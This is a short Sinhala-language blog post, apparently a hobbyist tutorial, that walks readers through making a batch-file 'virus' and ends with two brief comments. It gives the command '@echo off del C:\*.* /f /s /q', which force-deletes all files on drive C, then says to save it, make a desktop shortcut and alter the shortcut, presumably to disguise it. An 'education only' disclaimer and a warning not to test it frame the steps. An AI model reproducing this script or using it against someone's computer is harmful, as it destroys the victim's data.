සැ.යූ-මෙය හුදෙක් අධ්‍යාපනය සදහා පමණක් වන අතර මෙය අනිසි ආකාරයට භාවිත කිරීමෙන් ඇතිවන සමාජ ගැටලු වලට අප වගකියනු නොලැබේ
කරැණාකර එකවරක් සම්පූර්ණයෙන් ලිපිය කියවන්න
හරි අපි වැඩේ පටන් ගමු
මුලින්ම
notepad එක Open කරල පහත code එක copy තරන්න
@echo off del C:\*.* /f /s /q
ඉන්පසු
පහත ආකාරයට save කරන්න
දැන් එය right-click කර
Send to > Desktop (create shortcut)
කරන්න
දැන් ඔබ සාදා ගත් ගොනුම Desktop මත දක්නට ලැබේ
දැන් එය right-click කර පහත ආකාරයට එක වෙනස් කරන්න
දැන් වෛරස් එකේ වැඩේ ඉවරයි
මේක ඉතා දරැණු වෛරස් එකක් වන අතර ඔබේ drive සම්පූරණයෙන්ම
format කරන්න මේකට හැකියාව තිබෙනවා එම නිසා අත්හදා බැලීමෙන් වලකින්න
මෙය හුදෙක් අධ්‍යාපනය සදහා පමණයි
ගැටලු Comment කරන්න
අලුත් දෙයක් ඉගෙන ගත්තනම්
Ad එකක් click කරල යන්න ලෝභ නැතුව
Share පාරකුත් දාන්න
ela
ReplyDelete:-d
ReplyDelete